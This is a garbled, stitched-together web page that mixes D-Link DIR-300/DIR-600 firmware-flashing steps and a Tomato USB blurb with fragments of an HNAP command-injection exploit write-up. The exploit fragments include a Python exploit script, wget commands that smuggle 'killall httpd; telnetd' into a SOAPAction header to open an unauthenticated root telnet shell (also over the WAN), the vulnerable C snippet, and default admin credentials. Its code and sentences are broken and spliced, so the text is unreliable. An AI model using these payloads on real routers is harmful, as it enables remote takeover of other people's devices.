command = "killall httpd; killall hnap; telnetd -p %s" % port headers = req = urllib2.
Request(url, None, headers) try: urllib2.urlopen(req) raise Exception("Unexpected response") except httplib.
To install dd-wrt on either a D-Link DIR-300 Revision B1 or a D-Link DIR-600 Revision B1, you need to flash it directly from the router's web admin page (yes, that is correct... These are the steps to follow: If you forget the username or password, or if the configuration becomes really messed up, you can always clear all the non-volitile parameters by doing a 'factory reset'.
To do this, with the router already fully booted, press and hold the reset button for 5~6 seconds and release. Type the following command to download stock firmware V2.04 for DIR-300 B1. Type the following command to flash your router with the downloaded stock firmware. If there is no problem during the operation above, reboot your router.
Tomato USB is an alternative open source firmware for Broadcom-based routers like the ASUS RT-N66U Black Knight.
It is a modification of the famous Tomato Firmware but with built-in support for USB port, wireless-N support.
:(" I’ve tested both the v1.00 and v1.03 firmware (v1.03 being the latest at the time of this writing), and both are vulnerable.
Rev B1 is based on Ralink RT3050 So C and from all accounts, including Dlink's FCC test report, the PCBA is exactly the same as in the DIR-600.= NULL) else /* Build the command using the specified SOAPAction string and execute it */ sprintf(command, "sh %s%$ wget --header='SOAPAction: " Device Settings/`telnetd`"' $ telnet 192.168.0.1 Trying 192.168.0.1... # If remote administration is enabled, HNAP requests are honored from the WAN, making remote exploitation possible. Busy Box v1.14.1 (2015-02-11 CST) built-in shell (msh) Enter 'help' for a list of built-in commands. /usr/bin/env python import sys import urllib2 import httplib try: ip_port = sys.argv.split(':') ip = ip_port if len(ip_port) == 2: port = ip_port elif len(ip_port) == 1: port = "80" else: raise Index Error except Index Error: print "Usage: %s " % sys.argv sys.exit(1) url = " % (ip, port) # NOTE: If exploiting from the LAN, telnetd can be started on # any port; killing the http server and re-using its port # is not necessary.Of course, the router’s firewall will block any incoming telnet connections from the WAN; a simple solution is to kill off the HTTP server and spawn your telnet server on whatever port the HTTP server was bound to: $ wget --header='SOAPAction: " Device Settings/`killall httpd; telnetd -p 8080`"' $ telnet 18.104.22.168 8080 Trying 22.214.171.124... # # Killing off all hung hnap processes ensures that we can # re-start httpd later.This means it's quick and easy to check the hardware revision before buying or borrowing it.The factory default IP for this router is 192.168.0.1, user is "admin", password is blank.Firmware upgrades can provide tons of new features and improvements to a router’s default setup.